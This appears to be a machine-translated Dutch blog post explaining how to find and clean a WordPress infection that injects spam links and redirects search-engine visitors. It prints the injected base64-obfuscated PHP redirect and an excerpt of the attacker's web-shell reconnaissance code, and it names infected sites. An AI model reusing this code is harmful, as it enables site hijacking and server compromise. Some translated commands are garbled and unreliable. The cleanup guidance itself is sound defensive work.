De afgelopen maand kreeg ik steeds waarschuwingen van virus in blog van enkele bezoekers. In eerste instantie negeerde ik de waarschuwingen, omdat ik een redelijk goede antivirus had geïnstalleerd (Kaspersky AV 2009) en hoewel ik een lange tijd op de blog heb doorgebracht, heb ik nooit de viruswaarschuwing ontvangen (.. een tijdje geleden zag ik iets verdachts, dat verdween bij de eerste vernieuwing. Eindelijk...).
Langzaam, langzaam begonnen er grote variaties te verschijnen bezoekersverkeer, waarna de laatste tijd het verkeer voortdurend is afgenomen en er steeds meer mensen zijn die mij dat vertellen stealthsettings.com het is virusat. Gisteren ontving ik van iemand een screenshot die was gemaakt toen de antivirus er een blokkeerde script van stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Het was voor mij overtuigend genoeg, dat ik er in alle bronnen naar ging zoeken. Het eerste idee dat in mij opkwam was om het te doen upgraden naar de nieuwste versie van WordPress (2.5.1), maar niet voordat alle oude WordPress-scriptbestanden zijn verwijderd en gedaan back-up van de database. Deze procedure leverde geen enkel resultaat op en het zou me waarschijnlijk veel tijd hebben gekost om erachter te komen waar de bug zat, als hij het me niet had verteld Eugen in een gesprek bij de koffie, dat vond hij een koppeling op Google en het zou goed zijn om het te zien.
MyDigitalLife.info, publiceerde een artikel met de titel: "WordPress-hack: herstel en herstel Google- en zoekmachineverkeer of geen cookieverkeer dat wordt omgeleid naar Your-Needs.info, AnyResults.Net, Golden-Info.net en andere illegale sites', wat het einde is van de draad die ik nodig had.
Het gaat over een uitbuiten door WordPress op basis van cookies, wat naar mijn mening erg complex is en gemaakt volgens het boek. Slim genoeg om er een te maken SQL-injectie in de blogdatabase, om een ​​onzichtbare gebruiker te creëren tot een eenvoudige routinecontrole Dashboard->Gebruikers, om de "schrijfbare" mappen en bestanden op de server te controleren (die chmod 777 hebben), om te zoeken en naar uitvoeren bestanden met groeps- of zelfs rootrechten. Ik ken de naam van de exploit niet en ik zie dat er weinig artikelen over zijn geschreven, ondanks het feit dat er veel geïnfecteerde blogs zijn, ook uit Roemenië. Oké... ik zal proberen de algemeenheden over dit virus uit te leggen.

Wat doet het virus?

Allereerst voegt het in de bronnen van pagina's op blogs onzichtbare links in voor bezoekers, maar zichtbaar en indexeerbaar voor zoekmachines, vooral Google. Op deze manier Page Rank overbrengen naar sites die door de aanvaller zijn aangegeven. Ten tweede wordt er nog een ingevoegd omleidingscode URL, voor bezoekers die afkomstig zijn van Google, Live, Yahoo, ... of van een RSS-lezer en de site niet hebben koekje. En antivirus detecteert deze omleiding als Trojan-Clicker.HTML.

Symptomen:

De enorme daling van het bezoekersverkeer, vooral op blogs waar de meeste bezoekers afkomstig zijn van Google.

Identificeren: (dit is waar het probleem ingewikkeld wordt voor degenen die niet veel weten over phpmyadmin, php en linux)

DE. VOORZICHTIG!!! MAAK EERST EEN DATABASE BACK-UP!!!

1. Controleer de bestandsbronnen index.php, header.php, voettekst.php, uit het blogonderwerp en kijk of er een code is die codering gebruikt basis64 of bevat "if($ser=="1? && sizeof($_COOKIE)==0)” in de vorm:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

...of iets dergelijks. Verwijder deze code!

Klik op Stel je voor…

In de bovenstaande schermafbeelding heb ik per ongeluk "<?php get_header(); ?>Die code moet blijven.

2. Gebruik phpmyadmin en ga naar de tabel in de database wp_gebruikers, waar u controleert of er een gebruiker zonder naam is aangemaakt 00:00:00 0000-00-00 (het is mogelijk in het veld gebruiker_login schrijf "WordPress". Noteer de ID van deze gebruiker (ID-veld) en verwijder deze vervolgens.

Klik op Stel je voor…

*die op de groene lijn, de ID moet worden verwijderd en bewaard. In zijn geval slaperig, was ID = 8 .

3. Ga naar de tafel wp_usermeta, waar je moet gelegen jij bent VERWIJDEREN de regels gerelateerd aan de ID (waar in het veld gebruiker_id de waarde van de verwijderde ID verschijnt).

4. In de tabel wp_optie, ga naar binnen actieve_plug-ins en kijk welke plug-in verdacht is geactiveerd. Het kan eindes gebruiken zoals _oud.gif, _oud.pngg, _oud.jpeg, _nieuw.php.gif, etc. combinaties van valse afbeeldingsextensies met _oud en _nieuw.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Verwijder deze plug-in en ga naar de blog –> Dashboard –> Plug-ins, waarbij u een bepaalde plug-in deactiveert en activeert.

Klik op de afbeelding om te zien hoe het geïnfecteerde bestand wordt weergegeven in active_plugins.

Volg het FTP- of SSH-pad aangegeven in active_plugins en verwijder het bestand van de server.

5. Ook in phpMyAdmin, in de tabel wp_optie, zoek en verwijder de regel met "rss_f541b3abd05e7962fcab37737f40fad8"en draai"interne_links_cache”.
In internal_links_cache worden de spamlinks die in de blog verschijnen en a Google Adsense-code, van de hacker.

6. Het wordt aanbevolen dat u wachtwoord wijzigen van inloggen op de blog en zo verwijder alle verdachte gebruikers. Upgrade naar de nieuwste versie van WordPress en stel de blog zo in dat de registratie van nieuwe gebruikers niet langer wordt toegestaan. Er is geen verlies... zelfs niet-ingelogd kan reageren.

Ik heb hierboven geprobeerd uit te leggen hoeveel, wat te doen in een dergelijke situatie, om de blog van dit virus op te schonen. Het probleem is veel ernstiger dan het lijkt en niet verre van opgelost, omdat ze worden gebruikt beveiligingsproblemen van de hostende webserver, waarop de blog staat.

Als eerste veiligheidsmaatregel, wie toegang heeft SSH, om enkele controles op de server uit te voeren om te zien of er nog steeds bestanden zijn zoals *_old* en *_new.* met de uitgangen .gif, .jpeg, .pngg, .jpgg. Deze bestanden moeten worden verwijderd. Als we een bestand hernoemen, b.v. top_right_old.gif in top_right_old.php, zien we dat het bestand precies de exploitcode van de server bevat.

Enkele nuttige tips voor het controleren, opschonen en beveiligen van de server. (via SSH)

1. cd/tmp en controleer of er dergelijke mappen zijn tmpVFlma of andere soortgelijke naamcombinaties en verwijder deze. Je kunt in de onderstaande schermafbeelding twee van dergelijke mappen voor mij zien:

rm –rf nummermap

2. Controleer en verwijder (verander de chmod) zoveel mogelijk de mappen met attributen chmod 777

vind alle beschrijfbare bestanden in de huidige map: vinden . -type f -perm -2 -ls
vind alle beschrijfbare mappen in de huidige map: vinden . -type d -perm -2 -ls
vind alle beschrijfbare mappen en bestanden in de huidige map: vinden . -perm -2 –ls

3. Zoek naar verdachte bestanden op de server.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, VOORZICHTIG!!! naar de bestanden die de bit instellen ZUIDEN En Vleet. Deze bestanden worden uitgevoerd met de rechten van de gebruiker (groep) of root, niet met die van de gebruiker die het bestand uitvoert. Deze bestanden kunnen leiden tot rootcompromis als er beveiligingsproblemen zijn. Als u geen bestanden met SUID- en SGID-bits gebruikt, voert u “chmod 0” erop of verwijder het pakket dat ze bevat.

De exploit bevat ergens in de broncode...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

...praktisch op deze manier ontdekt hij inbreuken op de beveiliging. Open poorten, "schrijfbare" mappen en bestandsuitvoering met groeps- / rootrechten.

Ik kom terug met details...

Sommige geïnfecteerde blogs: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiologie.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... en de lijst kan nog veel meer zijn.

Je kunt controleren of een blog is geïnfecteerd door de Google-zoekmachine te gebruiken. kopiëren & plakken:

site: www.blegoo.com kopen

Welterusten en goed werk ;) Binnenkort denk ik dat Eugen met nieuws komt, op prevezibil.imprevizibil.com.

brb :)

AT: LET OP! Het wijzigen van het WordPress-thema of upgraden naar WordPress 2.5.1 is GEEN oplossing om van dit virus af te komen.